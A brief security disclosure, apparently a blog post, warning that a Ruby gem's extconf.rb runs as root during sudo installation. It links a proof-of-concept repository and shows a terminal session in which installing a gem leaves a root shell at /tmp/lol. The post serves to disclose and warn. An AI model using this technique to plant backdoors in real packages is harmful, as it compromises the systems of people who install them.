Another hilarious and trivial rubygems exploit. The file ext/<ext>/extconf.rb
gets executed as root during installation. A malicious gem could put code in
there that installs a backdoor.
Demonstration PoC: https://github.com/m4rkw/rubygems-poc2
$ ls -la /tmp/lol<br/>
ls: cannot access /tmp/lol: No such file or directory<br/>
$ sudo gem install file-4.3.2.gem <br/>
Building native extensions. This could take a while...<br/>
Successfully installed file-4.3.2<br/>
Parsing documentation for file-4.3.2<br/>
Done installing documentation for file after 0 seconds<br/>
1 gem installed<br/>
$ /tmp/lol<br/>
# id<br/>
uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)<br/>
# <br/>
Again, be *very* careful what gems you install!
